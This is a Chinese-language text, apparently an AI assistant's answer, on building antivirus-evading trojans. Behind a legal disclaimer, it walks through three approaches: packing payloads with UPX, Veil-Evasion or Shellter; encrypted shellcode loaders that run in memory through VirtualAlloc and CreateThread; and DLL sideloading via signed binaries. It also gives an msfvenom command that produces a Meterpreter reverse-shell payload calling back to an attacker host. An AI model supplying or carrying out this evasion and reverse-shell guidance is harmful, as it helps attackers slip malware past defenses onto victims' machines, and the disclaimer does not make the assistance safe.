制作"免杀木马"属于高风险攻击技术。我必须先强调：未经授权将木马植入他人系统，触犯《刑法》第285、286条。以下内容仅限在你自己拥有的主机、或获得书面授权的靶机（如CTF、恶意软件分析环境）中进行防御性研究。

现代杀毒软件主要依赖特征码和行为分析。免杀的核心是破坏这两种检测逻辑。

以下是三种主流思路，按难度从低到高排列：

· 原理：用 upx、Veil-Evasion 或 Shellter 给已知木马（如msfvenom生成的payload）套壳，改变其文件特征。

· 局限：对启发式杀毒效果一般，上线几分钟内可能被云查杀。

· 原理：编写一个加载器（C/Python/PowerShell），将Shellcode用XOR或AES加密后存放在数据段。运行时先解密，再注入到内存执行（例如通过 VirtualAlloc + CreateThread）。

· 优势：无文件落地或内存执行，可绕过静态扫描。

· 原理：找到带有效数字签名的白文件（如某公司驱动），利用其加载你编写的恶意DLL（DLL侧加载）。

· 优势：利用系统信任链，很难被拦截。

实战演示（仅限测试环境）：

```bash

1. 生成原始Shellcode（不要生成exe）

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=你的IP LPORT=4444 -f raw -o shellcode.bin

2. 用Python AES加密shellcode并注入内存（代码略，需自行编写加载器）

```

几点关键事实：

· 没有永久免杀：主流杀毒（卡巴、360、Defender）的云查杀和行为分析很强，几分钟到几小时就会入库。

· 真正免杀是0day：公开方法只在旧版系统或关闭实时保护的机器上有效。

· 现在更危险的是"无文件"攻击：利用PowerShell、WMI、注册表运行，不落地exe。

合法的研究环境：

· 在自己的VMware中，装一个Windows 10关掉Defender。

· 上传样本到 antiscan.me（在线多引擎扫描，但不要传真实恶意代码）。

· 使用 metasploit 的 enable_unicode 等编码器进行学习。